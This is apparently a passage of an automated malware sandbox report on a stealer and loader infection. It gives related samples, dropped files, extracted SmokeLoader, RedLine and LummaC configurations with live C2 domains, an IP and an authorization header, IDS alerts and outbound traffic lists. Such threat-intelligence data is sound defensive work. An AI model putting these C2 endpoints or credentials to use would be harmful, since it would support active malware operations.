	bashirc.x86_64	Get hash	malicious	Unknown	Browse	51.255.171.23
	d.py	Get hash	malicious	PwnRig Miner	Browse	51.255.171.23
	MDE_File_Sample_c7da8e8d530606f98d3014dbf9ce345b0d07dd48.zip	Get hash	malicious	Unknown	Browse	51.222.239.230
	IMG-20231215-WA0005[94].vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	144.217.159.195
	PO46823.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse	51.91.30.159
	AWWS.exe	Get hash	malicious	FormBook, NSISDropper	Browse	144.217.153.176
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	198.245.61.196

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	172.67.215.49 104.21.88.149
	SimpleROOSg.exe	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	lC8uzWy9b0.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.215.49 104.21.88.149
	TbysngVFpK.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.215.49 104.21.88.149
	NKA6vEqGZU.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	172.67.215.49 104.21.88.149
	34Vbs_File.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.49 104.21.88.149
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	172.67.215.49 104.21.88.149
	Nueva_orden_de_compra.xlam.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	Items_order.vbs	Get hash	malicious	XWorm	Browse	172.67.215.49 104.21.88.149
	k#U00e9p_Felsorolt_t#U00e9telek.vbs	Get hash	malicious	XWorm	Browse	172.67.215.49 104.21.88.149
	Order_012024.vbs	Get hash	malicious	Redline Clipper	Browse	172.67.215.49 104.21.88.149
	BOL_Inv_20231218508466_6269422738.js	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	BOL_Inv_20231218508466_6269422738.js	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	Mobiles Arbeiten_aktuelle Tagesliste 2 Halbjahr 2023.xlsm	Get hash	malicious	Unknown	Browse	172.67.215.49 104.21.88.149
	GarEwUZuLO.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	172.67.215.49 104.21.88.149
	Zgh9WMogTw.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	172.67.215.49 104.21.88.149
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	172.67.215.49 104.21.88.149
	microsoftprofile.vbs	Get hash	malicious	Remcos	Browse	172.67.215.49 104.21.88.149
	o7dKnIGaW3.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	172.67.215.49 104.21.88.149
	bbSC5jm8tF.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT	Browse	172.67.215.49 104.21.88.149
523e76adb7aac8f6a8b2bf1f35d85d1f	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	178.33.163.4 103.20.214.243 198.49.23.145 185.230.63.107 198.185.159.144 198.49.23.144 172.217.15.206 15.197.192.55 69.20.103.147 13.248.169.48 64.91.249.20 83.98.155.23 104.21.4.150 199.59.243.225 199.34.228.152 104.21.20.204 217.160.0.164 199.60.103.25 213.186.33.19 96.45.112.177 192.252.146.15 192.185.100.42 87.98.154.146 199.60.103.2 76.223.105.230 65.8.178.81 23.227.38.74 34.133.154.140 95.128.72.24 104.26.7.37 151.101.1.195 217.19.254.237 185.230.63.171 23.227.38.32 103.26.43.131 199.34.228.100 66.96.160.139 162.159.134.42 34.149.87.45 69.49.101.57 185.103.16.167 77.72.0.94 205.178.187.19 54.69.113.134 95.173.180.22 3.64.163.50 157.112.187.45 108.163.227.170 45.56.74.212 172.67.181.211 209.126.24.60 3.33.130.190 162.215.248.230 166.62.28.100
	BRvptajioG.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	178.33.163.4 103.20.214.243 198.49.23.145 185.230.63.107 198.185.159.144 198.49.23.144 172.217.15.206 15.197.192.55 69.20.103.147 13.248.169.48 64.91.249.20 83.98.155.23 104.21.4.150 199.59.243.225 199.34.228.152 104.21.20.204 217.160.0.164 199.60.103.25 213.186.33.19 96.45.112.177 192.252.146.15 192.185.100.42 87.98.154.146 199.60.103.2 76.223.105.230 65.8.178.81 23.227.38.74 34.133.154.140 95.128.72.24 104.26.7.37 151.101.1.195 217.19.254.237 185.230.63.171 23.227.38.32 103.26.43.131 199.34.228.100 66.96.160.139 162.159.134.42 34.149.87.45 69.49.101.57 185.103.16.167 77.72.0.94 205.178.187.19 54.69.113.134 95.173.180.22 3.64.163.50 157.112.187.45 108.163.227.170 45.56.74.212 172.67.181.211 209.126.24.60 3.33.130.190 162.215.248.230 166.62.28.100
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	178.33.163.4 103.20.214.243 198.49.23.145 185.230.63.107 198.185.159.144 198.49.23.144 172.217.15.206 15.197.192.55 69.20.103.147 13.248.169.48 64.91.249.20 83.98.155.23 104.21.4.150 199.59.243.225 199.34.228.152 104.21.20.204 217.160.0.164 199.60.103.25 213.186.33.19 96.45.112.177 192.252.146.15 192.185.100.42 87.98.154.146 199.60.103.2 76.223.105.230 65.8.178.81 23.227.38.74 34.133.154.140 95.128.72.24 104.26.7.37 151.101.1.195 217.19.254.237 185.230.63.171 23.227.38.32 103.26.43.131 199.34.228.100 66.96.160.139 162.159.134.42 34.149.87.45 69.49.101.57 185.103.16.167 77.72.0.94 205.178.187.19 54.69.113.134 95.173.180.22 3.64.163.50 157.112.187.45 108.163.227.170 45.56.74.212 172.67.181.211 209.126.24.60 3.33.130.190 162.215.248.230 166.62.28.100
	Ma0hVedIX4.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	178.33.163.4 103.20.214.243 198.49.23.145 185.230.63.107 198.185.159.144 198.49.23.144 172.217.15.206 15.197.192.55 69.20.103.147 13.248.169.48 64.91.249.20 83.98.155.23 104.21.4.150 199.59.243.225 199.34.228.152 104.21.20.204 217.160.0.164 199.60.103.25 213.186.33.19 96.45.112.177 192.252.146.15 192.185.100.42 87.98.154.146 199.60.103.2 76.223.105.230 65.8.178.81 23.227.38.74 34.133.154.140 95.128.72.24 104.26.7.37 151.101.1.195 217.19.254.237 185.230.63.171 23.227.38.32 103.26.43.131 199.34.228.100 66.96.160.139 162.159.134.42 34.149.87.45 69.49.101.57 185.103.16.167 77.72.0.94 205.178.187.19 54.69.113.134 95.173.180.22 3.64.163.50 157.112.187.45 108.163.227.170 45.56.74.212 172.67.181.211 209.126.24.60 3.33.130.190 162.215.248.230 166.62.28.100
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	178.33.163.4 103.20.214.243 198.49.23.145 185.230.63.107 198.185.159.144 198.49.23.144 172.217.15.206 15.197.192.55 69.20.103.147 13.248.169.48 64.91.249.20 83.98.155.23 104.21.4.150 199.59.243.225 199.34.228.152 104.21.20.204 217.160.0.164 199.60.103.25 213.186.33.19 96.45.112.177 192.252.146.15 192.185.100.42 87.98.154.146 199.60.103.2 76.223.105.230 65.8.178.81 23.227.38.74 34.133.154.140 95.128.72.24 104.26.7.37 151.101.1.195 217.19.254.237 185.230.63.171 23.227.38.32 103.26.43.131 199.34.228.100 66.96.160.139 162.159.134.42 34.149.87.45 69.49.101.57 185.103.16.167 77.72.0.94 205.178.187.19 54.69.113.134 95.173.180.22 3.64.163.50 157.112.187.45 108.163.227.170 45.56.74.212 172.67.181.211 209.126.24.60 3.33.130.190 162.215.248.230 166.62.28.100
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	178.33.163.4 103.20.214.243 198.49.23.145 185.230.63.107 198.185.159.144 198.49.23.144 172.217.15.206 15.197.192.55 69.20.103.147 13.248.169.48 64.91.249.20 83.98.155.23 104.21.4.150 199.59.243.225 199.34.228.152 104.21.20.204 217.160.0.164 199.60.103.25 213.186.33.19 96.45.112.177 192.252.146.15 192.185.100.42 87.98.154.146 199.60.103.2 76.223.105.230 65.8.178.81 23.227.38.74 34.133.154.140 95.128.72.24 104.26.7.37 151.101.1.195 217.19.254.237 185.230.63.171 23.227.38.32 103.26.43.131 199.34.228.100 66.96.160.139 162.159.134.42 34.149.87.45 69.49.101.57 185.103.16.167 77.72.0.94 205.178.187.19 54.69.113.134 95.173.180.22 3.64.163.50 157.112.187.45 108.163.227.170 45.56.74.212 172.67.181.211 209.126.24.60 3.33.130.190 162.215.248.230 166.62.28.100
83d60721ecc423892660e275acc4dffd	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	91.213.233.138
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse	91.213.233.138
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	91.213.233.138
	M6xATHbwxY.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader	Browse	91.213.233.138
	file.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, RisePro Stealer, SmokeLoader, Vidar	Browse	91.213.233.138
	SaLY22oLht.exe	Get hash	malicious	Unknown	Browse	91.213.233.138
	SyD1FiOG1p.exe	Get hash	malicious	LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	91.213.233.138
	K6DjJpNlzI.exe	Get hash	malicious	LummaC Stealer, RedLine, SmokeLoader	Browse	91.213.233.138
	8as7BA35XQ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	91.213.233.138
	82YWwkVfIS.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	91.213.233.138
	BRvptajioG.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	91.213.233.138
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	91.213.233.138
	Ma0hVedIX4.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	91.213.233.138
	Bznx8G6dMz.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	91.213.233.138

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\VBPlayerLIB\bin\x86\7z.exe (copy)	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse
	3XbeWk4htl.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, SmokeLoader	Browse
	GarEwUZuLO.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse
	Zgh9WMogTw.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse
	NBHEkIKDCr.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse
	o7dKnIGaW3.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse
	bbSC5jm8tF.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar, zgRAT	Browse
	74APa4Tj5X.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse
	SecuriteInfo.com.Trojan.Siggen22.40922.17747.3927.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40922.3885.25077.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40922.29866.19302.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40920.18605.8983.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40920.19202.199.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40921.27608.22557.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40889.14381.24582.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40888.11234.29256.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40922.20827.5895.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40889.6199.15025.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.FileRepMalware.17564.26341.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	SecuriteInfo.com.Trojan.Siggen22.40889.32699.17687.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
C:\Program Files (x86)\VBPlayerLIB\VBPlayerLIB.exe	xSLm8YQMXX.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse

Source: http://engelgau.net/phpmyadmin/	Avira URL Cloud: Label: phishing
Source: http://diagramfiremonkeyowwa.fun:80/api	Avira URL Cloud: Label: malware
Source: neighborhoodfeelsa.fun	Avira URL Cloud: Label: malware

Source: 00000000.00000002.1708217847.0000000002571000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://snukerukeutit.org/", "http://lightseinsteniki.org/", "http://tyiuiunuewqy.org/", "http://liuliuoumumy.org/", "http://tonimiuyaytre.org/"]}
Source: 0000000D.00000002.2386114986.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "38.47.221.193:34368", "Bot Id": "1219-55000", "Authorization Header": "f09d04c6ceae2e1f2781449bf84a9f8f"}
Source: 8.2.5828.exe.730000.1.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["breakfastchanneljw.fun", "dayfarrichjwclik.fun", "neighborhoodfeelsa.fun", "ratefacilityframw.fun", "reviveincapablewew.pw", "cakecoldsplurgrewe.pw", "opposesicknessopw.pw", "politefrightenpowoa.pw"], "Build id": "NmLpQW--spam2"}

Source: cream.hitsturbo.com	Virustotal: Detection: 18%	Perma Link
Source: lightseinsteniki.org	Virustotal: Detection: 20%	Perma Link
Source: blackdesign.com.sg	Virustotal: Detection: 10%	Perma Link

Source: C:\Program Files (x86)\VBPlayerLIB\VBPlayerLIB.exe	ReversingLabs: Detection: 33%
Source: C:\ProgramData\Drivers\csrss.exe	ReversingLabs: Detection: 78%
Source: C:\ProgramData\N75Bitscore\N75Bitscore.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\5316.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\5828.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\5D69.dll	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\AppData\Local\Temp\A0FE.exe	Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\A0FE.exe	Registry value created: NULL "C:\Users\user\AppData\Local\Temp\A0FE.exe"

Source: C:\Users\user\AppData\Local\Temp\5828.exe	Code function: 4x nop then mov eax, ebx	8_2_00731880
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then jmp 06578F4Ch	13_2_06578C89
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	13_2_065725C8
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then inc dword ptr [ebp-20h]	13_2_065722F8
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then jmp 0657E09Ah	13_2_0657E082
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then jmp 0657A9BDh	13_2_0657A99C
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then jmp 07AB1BB8h	13_2_07AB16D8
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then jmp 07AB0DB4h	13_2_07AB0040
Source: C:\Users\user\AppData\Local\Temp\7B24.exe	Code function: 4x nop then jmp 07AB0DB4h	13_2_07AB0AE2

Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.4:49734
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.4:49736
Source: Traffic	Snort IDS: 2855505 ETPRO TROJAN Lumma Stealer Related Activity 192.168.2.4:49741 -> 104.21.81.99:80
Source: Traffic	Snort IDS: 2855505 ETPRO TROJAN Lumma Stealer Related Activity 192.168.2.4:49742 -> 104.21.80.57:80

Source: Malware configuration extractor	URLs: breakfastchanneljw.fun
Source: Malware configuration extractor	URLs: dayfarrichjwclik.fun
Source: Malware configuration extractor	URLs: neighborhoodfeelsa.fun
Source: Malware configuration extractor	URLs: ratefacilityframw.fun
Source: Malware configuration extractor	URLs: reviveincapablewew.pw
Source: Malware configuration extractor	URLs: cakecoldsplurgrewe.pw
Source: Malware configuration extractor	URLs: opposesicknessopw.pw
Source: Malware configuration extractor	URLs: politefrightenpowoa.pw
Source: Malware configuration extractor	URLs: http://snukerukeutit.org/
Source: Malware configuration extractor	URLs: http://lightseinsteniki.org/
Source: Malware configuration extractor	URLs: http://tyiuiunuewqy.org/
Source: Malware configuration extractor	URLs: http://liuliuoumumy.org/
Source: Malware configuration extractor	URLs: http://tonimiuyaytre.org/
Source: Malware configuration extractor	URLs: 38.47.221.193:34368

Source: global traffic	TCP traffic: 173.194.216.27 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 188.165.47.122 ports 25,143,110,220,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 217.76.128.47 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 178.33.163.4 ports 22,143,2,222,443,465,993,995,80,21
Source: global traffic	TCP traffic: 104.47.71.138 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 153.92.0.100 ports 22,143,990,110,1,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 147.182.160.18 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.8.36 ports 143,465,4,5,995,6
Source: global traffic	TCP traffic: 198.49.23.145 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 193.25.197.210 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 212.159.8.200 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 69.49.101.236 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 198.49.23.144 ports 22,0,990,222,443,2222,8,80,21
Source: global traffic	TCP traffic: 135.148.130.76 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 185.53.56.46 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 185.53.56.44 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 15.197.192.55 ports 22,143,990,1,2,222,443,465,995,80,21
Source: global traffic	TCP traffic: 69.20.103.147 ports 22,0,990,222,443,2222,8,80,21
Source: global traffic	TCP traffic: 198.54.122.240 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 13.248.169.48 ports 22,143,990,110,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 64.182.43.254 ports 22,143,990,110,1,2,222,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 83.98.155.23 ports 22,0,990,222,443,2222,8,80,21
Source: global traffic	TCP traffic: 217.70.184.38 ports 22,0,990,222,443,2222,8,80,21
Source: global traffic	TCP traffic: 195.145.184.85 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 216.40.47.17 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 104.21.20.204 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 66.96.140.164 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 52.101.68.3 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 96.45.112.177 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 66.96.140.165 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 104.47.73.138 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 104.47.75.164 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 205.178.189.129 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 104.47.55.138 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 35.165.242.85 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 91.213.13.233 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.47.59.138 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 15.197.142.173 ports 22,0,143,990,110,222,465,443,993,587,995,2222,8,80,21
Source: global traffic	TCP traffic: 164.90.197.162 ports 143,110,465,993,4,587,5,995,6
Source: global traffic	TCP traffic: 208.113.220.170 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 95.128.72.24 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 185.230.63.171 ports 22,990,1,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 176.74.27.137 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 209.85.202.27 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 209.85.202.26 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 148.163.129.51 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 217.160.0.195 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 41.203.27.92 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 69.49.101.57 ports 22,0,990,222,443,8,80,21
Source: global traffic	TCP traffic: 185.103.16.167 ports 22,143,990,110,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 76.223.54.146 ports 22,143,990,110,1,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 3.94.41.167 ports 22,143,110,990,222,3,443,465,993,4,587,995,80,21
Source: global traffic	TCP traffic: 216.239.32.21 ports 22,0,990,222,443,2222,8,80,21
Source: global traffic	TCP traffic: 67.152.113.12 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 104.21.18.123 ports 22,143,990,110,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 142.250.27.26 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 95.173.180.22 ports 22,0,990,222,443,2222,8,80,21
Source: global traffic	TCP traffic: 54.69.113.134 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 66.96.140.50 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.47.75.228 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 108.163.227.170 ports 22,0,143,990,110,222,443,465,993,587,995,2222,8,80,21
Source: global traffic	TCP traffic: 45.56.74.212 ports 22,990,2,443,80,21
Source: global traffic	TCP traffic: 162.255.119.149 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 209.126.24.60 ports 22,990,2,443,80,21
Source: global traffic	TCP traffic: 3.33.130.190 ports 22,990,143,110,1,2,222,443,465,587,995,2222,80,21
Source: global traffic	TCP traffic: 64.92.112.83 ports 22,143,110,1,2,443,465,993,587,995,80,21
Source: global traffic	TCP traffic: 154.209.61.218 ports 22,143,990,110,2,222,465,443,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 103.20.214.243 ports 22,990,222,3,443,4,2222,80,21
Source: global traffic	TCP traffic: 64.250.92.220 ports 22,0,990,222,2222,8,80,21
Source: global traffic	TCP traffic: 162.215.248.33 ports 143,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 185.230.63.107 ports 22,990,222,3,443,4,2222,80,21
Source: global traffic	TCP traffic: 44.229.66.233 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 104.143.9.211 ports 22,990,222,3,443,4,80,21
Source: global traffic	TCP traffic: 198.185.159.144 ports 22,990,3,443,4,80,21
Source: global traffic	TCP traffic: 52.101.40.0 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 66.96.140.52 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 173.203.187.1 ports 25,26,143,110,220,1,2525,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.137.0 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.137.2 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 52.101.40.24 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 64.91.249.20 ports 22,990,2,443,80,21
Source: global traffic	TCP traffic: 13.248.243.5 ports 22,990,1,2,222,21
Source: global traffic	TCP traffic: 104.21.4.150 ports 22,990,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 208.113.184.91 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 199.59.243.225 ports 22,0,143,990,110,222,465,443,993,587,995,2222,8,80,21
Source: global traffic	TCP traffic: 212.159.9.200 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 3.33.152.147 ports 22,143,990,110,1,222,3,465,993,4,587,995,21
Source: global traffic	TCP traffic: 199.34.228.152 ports 22,0,990,222,443,8,80,21
Source: global traffic	TCP traffic: 217.160.0.164 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 199.60.103.25 ports 22,0,990,222,443,8,80,21
Source: global traffic	TCP traffic: 213.186.33.19 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 162.215.248.42 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.86.6.113 ports 22,143,990,110,1,2,222,465,993,587,995,21
Source: global traffic	TCP traffic: 205.178.187.24 ports 22,990,1,2,222,443,2222,80,21
Source: global traffic	TCP traffic: 185.112.125.71 ports 22,0,990,222,2222,8,80,21
Source: global traffic	TCP traffic: 76.223.105.230 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 151.101.1.195 ports 22,0,990,222,443,8,80,21
Source: global traffic	TCP traffic: 217.19.254.237 ports 22,0,990,222,443,8,80,21
Source: global traffic	TCP traffic: 52.101.73.4 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 23.227.38.32 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 217.72.192.67 ports 25,143,110,1,2525,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.73.6 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 15.197.148.33 ports 22,143,990,2,222,465,995,21
Source: global traffic	TCP traffic: 103.26.43.131 ports 22,990,222,3,443,4,2222,80,21
Source: global traffic	TCP traffic: 205.178.189.131 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 52.101.73.8 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 199.34.228.100 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 66.96.160.139 ports 22,990,1,2,222,443,80,21
Source: global traffic	TCP traffic: 162.159.134.42 ports 22,990,2,222,443,80,21
Source: global traffic	TCP traffic: 18.133.136.187 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 104.47.71.202 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 64.233.186.27 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 52.101.132.30 ports 143,1,3,465,4,995
Source: global traffic	TCP traffic: 162.255.118.51 ports 143,110,1,3,465,993,4,587,995
Source: global traffic	TCP traffic: 143.244.202.96 ports 143,110,465,993,587,5,995,9
Source: global traffic	TCP traffic: 77.72.0.94 ports 22,1,2,222,443,80,21
Source: global traffic	TCP traffic: 20.216.139.123 ports 143,110,465,993,587,5,995,9
